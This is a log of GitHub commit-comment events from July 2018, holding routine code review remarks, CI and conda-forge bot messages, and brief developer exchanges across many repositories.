{"id":"7992983996","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29774117,"position":62,"line":1502,"path":"src/evdev-mt-touchpad.c","commit_id":"d32c9fe6436e35b5312dd584be138f143f31069f","created_at":"2018-07-20T05:15:41Z","updated_at":"2018-07-20T05:15:41Z","author_association":"NONE","body":"\"obviousness\" is basically the answer here, it reduces the reader's cognitive load. And even though all conditions are met it's still safer to guarantee that this cannot go wrong. At some point someone will change a condition ever so slightly and then things can *occasionally* fail in unexpected ways. Better safe than sorry here."}},"created_at":"2018-07-20T05:15:41Z"}
{"id":"7992985138","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"energy-plus/EnergyPlus"},"payload":{"comment":{"id":29774118,"position":null,"line":null,"path":null,"commit_id":"2775b15e40796870779ff44f1d74e2c56eb2104c","created_at":"2018-07-20T05:16:13Z","updated_at":"2018-07-20T05:16:13Z","author_association":"NONE","body":"CoilHackathonBranch1 (energy-plus) - x86_64-Linux-Ubuntu-14.04-custom_check: Build Failed\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2775b15e40796870779ff44f1d74e2c56eb2104c-PR6846-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.png)</a>  \n"}},"created_at":"2018-07-20T05:16:13Z"}
{"id":"7992986319","type":"CommitCommentEvent","actor":{"login":"hikalkan"},"repo":{"name":"volosoft/abp"},"payload":{"comment":{"id":29774121,"position":5,"line":21,"path":"samples/BookStore/src/Acme.BookStore.Web/Acme.BookStore.Web.csproj","commit_id":"a1f30d96d617baf42e3b30b5b0bd10a54ad2e439","created_at":"2018-07-20T05:16:42Z","updated_at":"2018-07-20T05:16:42Z","author_association":"MEMBER","body":"Please remove this ItemGroup"}},"created_at":"2018-07-20T05:16:42Z"}
{"id":"7992986995","type":"CommitCommentEvent","actor":{"login":"lanandha"},"repo":{"name":"lanandha/GUVI"},"payload":{"comment":{"id":29774122,"position":null,"line":null,"path":null,"commit_id":"895ebc47e9839c2f030ca5fc4e730af30e90fd18","created_at":"2018-07-20T05:17:00Z","updated_at":"2018-07-20T05:17:00Z","author_association":"OWNER","body":"46 - Given a number N, print the next number.\r\nInput Size : |N| <= 10000000\r\nSample Testcase :\r\nINPUT\r\n123\r\nOUTPUT\r\n124   variables operators conditional looping  "}},"created_at":"2018-07-20T05:17:00Z"}
{"id":"7992988395","type":"CommitCommentEvent","actor":{"login":"lanandha"},"repo":{"name":"lanandha/GUVI"},"payload":{"comment":{"id":29774126,"position":null,"line":null,"path":null,"commit_id":"7cd007de8cb9a6620e5d932f42c4b86ff13bbf93","created_at":"2018-07-20T05:17:35Z","updated_at":"2018-07-20T05:17:35Z","author_association":"OWNER","body":"46 - Given a number N, print the next number.\r\nInput Size : |N| <= 10000000\r\nSample Testcase :\r\nINPUT\r\n123\r\nOUTPUT\r\n124   variables operators conditional looping  "}},"created_at":"2018-07-20T05:17:35Z"}
{"id":"7992992519","type":"CommitCommentEvent","actor":{"login":"swetha-ashok"},"repo":{"name":"madcyph3r/WhatsApi-Android-1"},"payload":{"comment":{"id":29774129,"position":null,"line":null,"path":null,"commit_id":"9908099be1a73257a76b2d4c07ddc755860b9e2e","created_at":"2018-07-20T05:19:18Z","updated_at":"2018-07-20T05:19:18Z","author_association":"NONE","body":"Can u please suggest any alternate for what's app version , release token\nnumber,and release time\n\n\nOn Thu, Jul 19, 2018, 7:03 PM Swetha Sowji <swethasowji002@gmail.com> wrote:\n\n> That means it won't work anymore\n>\n> On Thu, Jul 19, 2018, 7:00 PM Giovanni Terlingen <notifications@github.com>\n> wrote:\n>\n>> This project is no longer maintained.\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/madcyph3r/WhatsApi-Android-1/commit/9908099be1a73257a76b2d4c07ddc755860b9e2e#commitcomment-29764557>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/Akq8qtHdAJ7q2QS3PrxxdaXntDCM54daks5uIInkgaJpZM4VWW92>\n>> .\n>>\n>\n"}},"created_at":"2018-07-20T05:19:18Z"}
{"id":"7992996013","type":"CommitCommentEvent","actor":{"login":"mdmayfield"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29774135,"position":49,"line":1524,"path":"src/evdev-mt-touchpad.c","commit_id":"92c52251d11ca72496556cd949730d33083e5c8d","created_at":"2018-07-20T05:20:46Z","updated_at":"2018-07-20T05:20:46Z","author_association":"OWNER","body":"I will look into the automated tests - thanks!\r\n\r\nIn the edge scrolling case, do you mean a situation where the user is moving the mouse with one finger and scrolling with another, or maybe edge scrolling in two dimensions at once using two fingers? I tested regular edge scrolling (while doing nothing else - one touch only) and it seemed to work fine."}},"created_at":"2018-07-20T05:20:46Z"}
{"id":"7992997279","type":"CommitCommentEvent","actor":{"login":"darktulu"},"repo":{"name":"booggie995/demo1"},"payload":{"comment":{"id":29774137,"position":1,"line":1,"path":"src/main/resources/banner.txt","commit_id":"0698e7336b98f827cd41192439ed03864457c790","created_at":"2018-07-20T05:21:19Z","updated_at":"2018-07-20T05:21:19Z","author_association":"COLLABORATOR","body":"lol"}},"created_at":"2018-07-20T05:21:19Z"}
{"id":"7992997549","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyarrow-feedstock"},"payload":{"comment":{"id":29774140,"position":null,"line":null,"path":null,"commit_id":"82a0e48ea24eaac0a6de503e5dde3555490c5c9e","created_at":"2018-07-20T05:21:25Z","updated_at":"2018-07-20T05:21:25Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pcmoritz, @kou were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @pcmoritz, @kou were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T05:21:25Z"}
{"id":"7992999183","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/parquet-cpp-feedstock"},"payload":{"comment":{"id":29774146,"position":null,"line":null,"path":null,"commit_id":"ccaa67e5abe6c72bb82d6751277c6fd6787ea069","created_at":"2018-07-20T05:22:06Z","updated_at":"2018-07-20T05:22:06Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kou were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @kou were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T05:22:06Z"}
{"id":"7993000641","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/arrow-cpp-feedstock"},"payload":{"comment":{"id":29774148,"position":null,"line":null,"path":null,"commit_id":"f131f5c6d2d8042da0931fb0a444ce295c873d8a","created_at":"2018-07-20T05:22:41Z","updated_at":"2018-07-20T05:22:41Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @pcmoritz, @kou were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @pcmoritz, @kou were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T05:22:41Z"}
{"id":"7993002273","type":"CommitCommentEvent","actor":{"login":"parthbkgadoya"},"repo":{"name":"parthbkgadoya/Image-based-Human-Age-and-Gender-Estimation"},"payload":{"comment":{"id":29774152,"position":null,"line":null,"path":null,"commit_id":"2d9977cd4ad365ba7b7c946bce86ab924abf94e7","created_at":"2018-07-20T05:23:23Z","updated_at":"2018-07-20T05:23:23Z","author_association":"OWNER","body":"Hi,\n\nI have worked on this project around 2 months back and on college local PC.\nAnd I am currently out of station and don't have access to that PC. I may\nnot be able to give those files currently.\n\nBut main code is \"bif.m\", other files are not much tough to code, you can\neasily get help from matlab standard functions (kpls) and create basic loop\nfor training and testing purposes. And you are done.\n\nThanks with regards,\nParth Gadoya\n"}},"created_at":"2018-07-20T05:23:23Z"}
{"id":"7993003498","type":"CommitCommentEvent","actor":{"login":"MGaetan89"},"repo":{"name":"material-components/material-components-android"},"payload":{"comment":{"id":29774155,"position":9,"line":17,"path":"docs/getting-started.md","commit_id":"5bdaa0de052d660096c4b09fe7f193636e5334db","created_at":"2018-07-20T05:23:58Z","updated_at":"2018-07-20T05:23:58Z","author_association":"NONE","body":"This should also have been updated to mention `google()` instead of `\"https://maven.google.com\"`."}},"created_at":"2018-07-20T05:23:58Z"}
{"id":"7993003703","type":"CommitCommentEvent","actor":{"login":"DaemonSultan"},"repo":{"name":"DaemonSultan/DrawTwoCards"},"payload":{"comment":{"id":29774156,"position":44,"line":36,"path":"scripts/build_dungeonDeck.gml","commit_id":"93207c6241537a78484d137c9ad840c04e3617cd","created_at":"2018-07-20T05:24:04Z","updated_at":"2018-07-20T05:24:04Z","author_association":"OWNER","body":"재밌는 사실: 사성 것은 제대로 작동하지 않았음."}},"created_at":"2018-07-20T05:24:04Z"}
{"id":"7993006361","type":"CommitCommentEvent","actor":{"login":"htdebeer"},"repo":{"name":"htdebeer/SVG-cards"},"payload":{"comment":{"id":29774162,"position":1,"line":1,"path":"Changelog","commit_id":"6006b7c0c87874e11cd10a205f5e85c4996b6577","created_at":"2018-07-20T05:25:12Z","updated_at":"2018-07-20T05:25:12Z","author_association":"OWNER","body":"@WKSefton \r\nThanks for your interest in SVG-cards!\r\n\r\nContributing is relatively easy because SVG-cards is basically just the one file: `svg-cards-indented.svg`: if you have any improvements to this SVG file, you can submit a pull request. Of course, you can also submit an issue if you think you have found a bug and you don't know how to (or want to) fix it yourself."}},"created_at":"2018-07-20T05:25:12Z"}
{"id":"7993010519","type":"CommitCommentEvent","actor":{"login":"nemosminer"},"repo":{"name":"nemosminer/NemosMiner"},"payload":{"comment":{"id":29774176,"position":null,"line":null,"path":null,"commit_id":"c67b1642079356f837aeaaf91f3496146999b065","created_at":"2018-07-20T05:26:52Z","updated_at":"2018-07-20T05:26:52Z","author_association":"OWNER","body":"sorted thanks"}},"created_at":"2018-07-20T05:26:52Z"}
{"id":"7993011418","type":"CommitCommentEvent","actor":{"login":"anwar6953"},"repo":{"name":"caskdata/cdap-integration-tests"},"payload":{"comment":{"id":29774179,"position":14,"line":113,"path":"integration-test-remote/src/test/java/co/cask/cdap/test/suite/AllTests.java","commit_id":"a4989dcea60af5dd02464662eb0e7288017b0885","created_at":"2018-07-20T05:27:15Z","updated_at":"2018-07-20T05:27:15Z","author_association":"CONTRIBUTOR","body":"convention is alphabetical order"}},"created_at":"2018-07-20T05:27:15Z"}
{"id":"7993011454","type":"CommitCommentEvent","actor":{"login":"albardas"},"repo":{"name":"albardas/pagina-web"},"payload":{"comment":{"id":29774180,"position":null,"line":null,"path":null,"commit_id":"27229ea0b1b2349be8370bbbb9ba27681a69f36e","created_at":"2018-07-20T05:27:16Z","updated_at":"2018-07-20T05:27:16Z","author_association":"OWNER","body":"Buena aportacion"}},"created_at":"2018-07-20T05:27:16Z"}
{"id":"7993013414","type":"CommitCommentEvent","actor":{"login":"yihui"},"repo":{"name":"ASKurz/recoding-Hayes-2018"},"payload":{"comment":{"id":29774187,"position":16,"line":11,"path":"index.rmd","commit_id":"6ab97c1e3aa877eac3de4442a173d854bdbb998f","created_at":"2018-07-20T05:28:07Z","updated_at":"2018-07-20T05:28:07Z","author_association":"NONE","body":"FYI, `description` should be plain text and should not contain Markdown syntax. You need to get rid of the hyperlinks."}},"created_at":"2018-07-20T05:28:07Z"}
{"id":"7993016211","type":"CommitCommentEvent","actor":{"login":"whot"},"repo":{"name":"mdmayfield/libinput"},"payload":{"comment":{"id":29774195,"position":49,"line":1524,"path":"src/evdev-mt-touchpad.c","commit_id":"92c52251d11ca72496556cd949730d33083e5c8d","created_at":"2018-07-20T05:29:16Z","updated_at":"2018-07-20T05:29:16Z","author_association":"NONE","body":"oh. i just realised in the edge scroll case you always want one of the fingers to be labelled as thumb when you have two down. I don't think we support two-dimensional edge-scrolling anyway. So I think that's a \"nevermind my comment\" resolution ;)\r\n\r\nwell, mostly. There's an unlikely case where x == y and now you fall through and mark neither as thumb. Changing the whole into a normal if/else should be sufficient here. Also gets rid of the misplaced-looking return."}},"created_at":"2018-07-20T05:29:16Z"}
{"id":"7993017715","type":"CommitCommentEvent","actor":{"login":"Alexstrowski"},"repo":{"name":"Alexstrowski/avengers"},"payload":{"comment":{"id":29774200,"position":null,"line":null,"path":null,"commit_id":"c2953671d2cad3d3852743d1c297e825d8e87e5f","created_at":"2018-07-20T05:29:53Z","updated_at":"2018-07-20T05:29:53Z","author_association":"OWNER","body":"Aquí creamos la misión de Red Skull #8 "}},"created_at":"2018-07-20T05:29:53Z"}
{"id":"7993024331","type":"CommitCommentEvent","actor":{"login":"arebee"},"repo":{"name":"Wyamio/Wyam"},"payload":{"comment":{"id":29774217,"position":null,"line":null,"path":null,"commit_id":"f6779494b9551f810c2d4ca17f079a2ccdd91af2","created_at":"2018-07-20T05:32:30Z","updated_at":"2018-07-20T05:32:30Z","author_association":"CONTRIBUTOR","body":"Ship it"}},"created_at":"2018-07-20T05:32:30Z"}
{"id":"7993027275","type":"CommitCommentEvent","actor":{"login":"jalperin"},"repo":{"name":"bozana/ALM"},"payload":{"comment":{"id":29774225,"position":23,"line":21,"path":"output.tpl","commit_id":"c47f2ac3cce279f3046bd48f7aab19eee44e1fa1","created_at":"2018-07-20T05:33:47Z","updated_at":"2018-07-20T05:33:47Z","author_association":"NONE","body":"These numbers should all be increased for production. Probably to at least 6 (they don't all need to be the same)"}},"created_at":"2018-07-20T05:33:47Z"}
{"id":"7993027404","type":"CommitCommentEvent","actor":{"login":"rodrigopedra"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29774226,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-20T05:33:50Z","updated_at":"2018-07-20T05:33:50Z","author_association":"CONTRIBUTOR","body":"Hi @philmareu , @browner12 already sent PR #24885  that reverts the change and it got merged. But it is not released yet. You can rollback to 5.6.27 while waiting for the next release to be tagged."}},"created_at":"2018-07-20T05:33:50Z"}
{"id":"7993029766","type":"CommitCommentEvent","actor":{"login":"jalperin"},"repo":{"name":"bozana/ALM"},"payload":{"comment":{"id":29774232,"position":37,"line":30,"path":"output.tpl","commit_id":"c47f2ac3cce279f3046bd48f7aab19eee44e1fa1","created_at":"2018-07-20T05:34:52Z","updated_at":"2018-07-20T05:34:52Z","author_association":"NONE","body":"should be false"}},"created_at":"2018-07-20T05:34:52Z"}
{"id":"7993031389","type":"CommitCommentEvent","actor":{"login":"AndyGrant"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29774234,"position":null,"line":null,"path":null,"commit_id":"8312a9b83de8535177c7790b55b8b6bde9479d4a","created_at":"2018-07-20T05:35:34Z","updated_at":"2018-07-20T05:35:34Z","author_association":"NONE","body":"I do believe another user tried this http://tests.stockfishchess.org/tests/view/5b5129460ebc5902bdb7d125"}},"created_at":"2018-07-20T05:35:34Z"}
{"id":"7993032342","type":"CommitCommentEvent","actor":{"login":"jalperin"},"repo":{"name":"bozana/ALM"},"payload":{"comment":{"id":29774238,"position":38,"line":31,"path":"output.tpl","commit_id":"c47f2ac3cce279f3046bd48f7aab19eee44e1fa1","created_at":"2018-07-20T05:35:56Z","updated_at":"2018-07-20T05:35:56Z","author_association":"NONE","body":"This could be an option. Showing the mini version will cause the new paperbuzz code to hide the graphs. So it is either mini or normal. "}},"created_at":"2018-07-20T05:35:56Z"}
{"id":"7993032747","type":"CommitCommentEvent","actor":{"login":"tomasnorre"},"repo":{"name":"AOEpeople/crawler"},"payload":{"comment":{"id":29774239,"position":1,"line":256,"path":"Classes/Controller/CrawlerController.php","commit_id":"f8c34315cd80e58ad09eb4dd49c84123a4c62068","created_at":"2018-07-20T05:36:05Z","updated_at":"2018-07-20T05:36:05Z","author_association":"CONTRIBUTOR","body":"Which redundant condition is moved ? \r\n\r\nI don't see it in this commit, so commit message is confusing me a little. :) "}},"created_at":"2018-07-20T05:36:05Z"}
{"id":"7993036970","type":"CommitCommentEvent","actor":{"login":"testevez"},"repo":{"name":"testevez/d8-atsnj"},"payload":{"comment":{"id":29774244,"position":null,"line":null,"path":null,"commit_id":"97587f12a4b2d55b677b625cc08df6e1a0426e32","created_at":"2018-07-20T05:37:54Z","updated_at":"2018-07-20T05:37:54Z","author_association":"OWNER","body":"Created multidev environment [d8-atsnj#ci-106](https://dashboard.pantheon.io/sites/e5e4f786-50c0-497c-819e-36c05121e231#ci-106).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-106-d8-atsnj.pantheonsite.io/)"}},"created_at":"2018-07-20T05:37:54Z"}
{"id":"7993040680","type":"CommitCommentEvent","actor":{"login":"Timandes"},"repo":{"name":"php-zookeeper/php-zookeeper"},"payload":{"comment":{"id":29774248,"position":null,"line":null,"path":null,"commit_id":"bd8291e23106df5a261edb807587a1a50f383950","created_at":"2018-07-20T05:39:25Z","updated_at":"2018-07-20T05:39:25Z","author_association":"MEMBER","body":"OK.\r\nThank you."}},"created_at":"2018-07-20T05:39:25Z"}
{"id":"7993040991","type":"CommitCommentEvent","actor":{"login":"bao3"},"repo":{"name":"recall704/tinyFecVPN"},"payload":{"comment":{"id":29774249,"position":null,"line":null,"path":null,"commit_id":"f06b67db103a6a77efe63f4ea9653c8b7a3d82fc","created_at":"2018-07-20T05:39:33Z","updated_at":"2018-07-20T05:39:33Z","author_association":"NONE","body":"提个建议啊。。。我不懂代码，但是我觉得是不是应该在代码开头加上一个 `#define NOLIMIT` 就解决了？？"}},"created_at":"2018-07-20T05:39:33Z"}
{"id":"7993043226","type":"CommitCommentEvent","actor":{"login":"mmgescuelaup"},"repo":{"name":"mmgescuelaup/WebService-Kristen"},"payload":{"comment":{"id":29774257,"position":null,"line":null,"path":null,"commit_id":"0172d1f6b473f84bd41a1b879daab202a5d85bf5","created_at":"2018-07-20T05:40:30Z","updated_at":"2018-07-20T05:40:30Z","author_association":"OWNER","body":"@manuelGTZ97 para que hiciste esto?\r\nSolo hacia falta que registraras los topics en firebase 👀 "}},"created_at":"2018-07-20T05:40:30Z"}
{"id":"7993043598","type":"CommitCommentEvent","actor":{"login":"mmgescuelaup"},"repo":{"name":"mmgescuelaup/WebService-Kristen"},"payload":{"comment":{"id":29774258,"position":28,"line":85,"path":"server/models/publicacion.js","commit_id":"0172d1f6b473f84bd41a1b879daab202a5d85bf5","created_at":"2018-07-20T05:40:38Z","updated_at":"2018-07-20T05:40:38Z","author_association":"OWNER","body":"Solo había que descomentar esta linea @manuelGTZ97 "}},"created_at":"2018-07-20T05:40:38Z"}
{"id":"7993047611","type":"CommitCommentEvent","actor":{"login":"farzam-azhar"},"repo":{"name":"farzam-azhar/pms"},"payload":{"comment":{"id":29774267,"position":16,"line":16,"path":"app/controllers/users_controller.rb","commit_id":"bb3d69b2d5029da504de300d30d703a1382ccf02","created_at":"2018-07-20T05:42:14Z","updated_at":"2018-07-20T05:42:14Z","author_association":"OWNER","body":"Removed"}},"created_at":"2018-07-20T05:42:14Z"}
{"id":"7993047773","type":"CommitCommentEvent","actor":{"login":"ABCabcKK"},"repo":{"name":"ABCabcKK/YiShu"},"payload":{"comment":{"id":29774268,"position":null,"line":null,"path":null,"commit_id":"969b28a1bc39e3e18160984973e58749bc03cb43","created_at":"2018-07-20T05:42:18Z","updated_at":"2018-07-20T05:42:18Z","author_association":"OWNER","body":"ff"}},"created_at":"2018-07-20T05:42:18Z"}
{"id":"7993052768","type":"CommitCommentEvent","actor":{"login":"qhwdw"},"repo":{"name":"wxy/TranslateProject"},"payload":{"comment":{"id":29774277,"position":null,"line":null,"path":null,"commit_id":"4f082e8e8c0b6a5890e4ff3396149e7495d41cdc","created_at":"2018-07-20T05:44:18Z","updated_at":"2018-07-20T05:44:18Z","author_association":"NONE","body":"我看了一下，校对的很好，没问题。这篇文章写的比较晦涩。\n\n\n\n\nSent from Mail Master\nOn 07/19/2018 18:45, Xingyu.Wang wrote:\nPRF:20171009 Considering Pythons Target Audience.md\n\n@qhwdw 初步校对了一遍，感觉好吃力。你看看有无问题和进一步修改。我先不发布。\n\n--\nYou are receiving this because you were mentioned.\nReply to this email directly or view it on GitHub:\nhttps://github.com/wxy/TranslateProject/commit/4f082e8e8c0b6a5890e4ff3396149e7495d41cdc"}},"created_at":"2018-07-20T05:44:18Z"}
{"id":"7993054875","type":"CommitCommentEvent","actor":{"login":"HolaJun"},"repo":{"name":"HolaJun/HolaJun.github.io"},"payload":{"comment":{"id":29774284,"position":null,"line":null,"path":null,"commit_id":"89f52c274c1cccc96705e5417a196e4be4d1439a","created_at":"2018-07-20T05:45:08Z","updated_at":"2018-07-20T05:45:08Z","author_association":"OWNER","body":"TEST"}},"created_at":"2018-07-20T05:45:08Z"}
{"id":"7993061754","type":"CommitCommentEvent","actor":{"login":"9160476108"},"repo":{"name":"octocat/Spoon-Knife"},"payload":{"comment":{"id":29774298,"position":1,"line":1,"path":"README.md","commit_id":"f439fc5710cd87a4025247e8f75901cdadf5333d","created_at":"2018-07-20T05:47:34Z","updated_at":"2018-07-20T05:47:34Z","author_association":"NONE","body":"hi"}},"created_at":"2018-07-20T05:47:34Z"}
{"id":"7993064332","type":"CommitCommentEvent","actor":{"login":"msalmanansari"},"repo":{"name":"msalmanansari/ecommerce"},"payload":{"comment":{"id":29774301,"position":null,"line":null,"path":null,"commit_id":"121eaec09e860ab70d88a80cff2d36b3d1162809","created_at":"2018-07-20T05:48:31Z","updated_at":"2018-07-20T05:48:31Z","author_association":"OWNER","body":"May be not in working condition, pls not bother it."}},"created_at":"2018-07-20T05:48:31Z"}
{"id":"7993064507","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774303,"position":16,"line":20,"path":"tn_01/quadratic_equation.rb","commit_id":"750cdbe8bb1a1601a41b6403289f3e7ba5292b35","created_at":"2018-07-20T05:48:35Z","updated_at":"2018-07-20T05:48:35Z","author_association":"NONE","body":"вот эта строчка вызовет вылет программы с исключением, в случае отрицательного дискриминанта"}},"created_at":"2018-07-20T05:48:35Z"}
{"id":"7993066233","type":"CommitCommentEvent","actor":{"login":"9160476108"},"repo":{"name":"octocat/Spoon-Knife"},"payload":{"comment":{"id":29774306,"position":1,"line":1,"path":"README.md","commit_id":"f439fc5710cd87a4025247e8f75901cdadf5333d","created_at":"2018-07-20T05:49:15Z","updated_at":"2018-07-20T05:49:15Z","author_association":"NONE","body":"hi"}},"created_at":"2018-07-20T05:49:15Z"}
{"id":"7993068525","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774311,"position":16,"line":20,"path":"tn_01/quadratic_equation.rb","commit_id":"750cdbe8bb1a1601a41b6403289f3e7ba5292b35","created_at":"2018-07-20T05:50:10Z","updated_at":"2018-07-20T05:50:10Z","author_association":"NONE","body":"к тому же считать корень вообще не нужно, если дискриминант ноль или отрицательный\r\nя имею в виду представь себе, что здесь более сложные ресурсоемкие рассчеты, зачем их запускать, если результат понятен"}},"created_at":"2018-07-20T05:50:10Z"}
{"id":"7993071038","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774313,"position":21,"line":25,"path":"tn_01/quadratic_equation.rb","commit_id":"750cdbe8bb1a1601a41b6403289f3e7ba5292b35","created_at":"2018-07-20T05:51:10Z","updated_at":"2018-07-20T05:51:10Z","author_association":"NONE","body":"эта формула неверная, посмотри внимательно на знаменатель ) \r\nскобок не хватает"}},"created_at":"2018-07-20T05:51:10Z"}
{"id":"7993072277","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774317,"position":27,"line":29,"path":"tn_01/quadratic_equation.rb","commit_id":"750cdbe8bb1a1601a41b6403289f3e7ba5292b35","created_at":"2018-07-20T05:51:39Z","updated_at":"2018-07-20T05:51:39Z","author_association":"NONE","body":"в этих формулах аналогичная ошибка, не хватает скобок"}},"created_at":"2018-07-20T05:51:39Z"}
{"id":"7993073383","type":"CommitCommentEvent","actor":{"login":"chykkxx"},"repo":{"name":"chykkxx/chy"},"payload":{"comment":{"id":29774320,"position":null,"line":null,"path":null,"commit_id":"7d376dafaa48274b57acf45538c5c6648df4d19c","created_at":"2018-07-20T05:52:07Z","updated_at":"2018-07-20T05:52:07Z","author_association":"OWNER","body":"sdfadsf"}},"created_at":"2018-07-20T05:52:07Z"}
{"id":"7993075039","type":"CommitCommentEvent","actor":{"login":"hi-man"},"repo":{"name":"hi-man/SeasLog"},"payload":{"comment":{"id":29774324,"position":25,"line":67,"path":"src/Common.c","commit_id":"afe0a2a6427d4551284e696c8e93735936c63c96","created_at":"2018-07-20T05:52:47Z","updated_at":"2018-07-20T05:52:47Z","author_association":"OWNER","body":"是个bug，修复版本：[fix check_log_level : log level should lower than setting 'seaslog.level'](https://github.com/hi-man/SeasLog/commit/d4c6d96519140f0c3550c80bced13ffa4b3fcc44)"}},"created_at":"2018-07-20T05:52:47Z"}
{"id":"7993079464","type":"CommitCommentEvent","actor":{"login":"Burgerboy93"},"repo":{"name":"Burgerboy93/HIT238"},"payload":{"comment":{"id":29774336,"position":null,"line":null,"path":null,"commit_id":"4055937b9f48dc9b67afdae949f60a7cb636d50e","created_at":"2018-07-20T05:54:31Z","updated_at":"2018-07-20T05:54:31Z","author_association":"OWNER","body":"Added Theme"}},"created_at":"2018-07-20T05:54:31Z"}
{"id":"7993079493","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":29774337,"position":null,"line":null,"path":null,"commit_id":"8312a9b83de8535177c7790b55b8b6bde9479d4a","created_at":"2018-07-20T05:54:32Z","updated_at":"2018-07-20T05:54:32Z","author_association":"OWNER","body":"Oh, I missed this one, thanks!"}},"created_at":"2018-07-20T05:54:32Z"}
{"id":"7993081494","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774343,"position":18,"line":24,"path":"tn_01/right_triangle.rb","commit_id":"df5e4eca22c71b2cd2d1144d4b9b2b486845e68c","created_at":"2018-07-20T05:55:18Z","updated_at":"2018-07-20T05:55:18Z","author_association":"NONE","body":"можешь оставить, но в общем-то не обязательно вытаскивать значения в переменные, раз уж ты работаель с массивом\r\nвполне можно так дальше и обращаться к элементам массива"}},"created_at":"2018-07-20T05:55:18Z"}
{"id":"7993087111","type":"CommitCommentEvent","actor":{"login":"basil-conto"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29774354,"position":14,"line":94,"path":"ivy-overlay.el","commit_id":"13d528e406d1a8d33be71762df14fde03d755c45","created_at":"2018-07-20T05:57:24Z","updated_at":"2018-07-20T05:57:24Z","author_association":"CONTRIBUTOR","body":"Should this be `string-width`?"}},"created_at":"2018-07-20T05:57:24Z"}
{"id":"7993089371","type":"CommitCommentEvent","actor":{"login":"populist"},"repo":{"name":"badcamp/badcamp-2018"},"payload":{"comment":{"id":29774360,"position":null,"line":null,"path":null,"commit_id":"e734867c1b1b7071c6dff022e8eb5b072e31549b","created_at":"2018-07-20T05:58:15Z","updated_at":"2018-07-20T05:58:15Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [badcamp-2018#ci-258](https://dashboard.pantheon.io/sites/0cebc770-0754-4f81-9138-24661ae588a0#ci-258).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-258-badcamp-2018.pantheonsite.io/)"}},"created_at":"2018-07-20T05:58:15Z"}
{"id":"7993090217","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"alxor/tn-ruby"},"payload":{"comment":{"id":29774362,"position":26,"line":32,"path":"tn_01/right_triangle.rb","commit_id":"df5e4eca22c71b2cd2d1144d4b9b2b486845e68c","created_at":"2018-07-20T05:58:33Z","updated_at":"2018-07-20T05:58:33Z","author_association":"NONE","body":"лучше не смешивать логику и аутпут\r\nдругими словами правильней здесь будет отдельно вычислить значение переменной `right_triangle`, а уже потом в зависимости от этого значения делать различный аутпут\r\n"}},"created_at":"2018-07-20T05:58:33Z"}
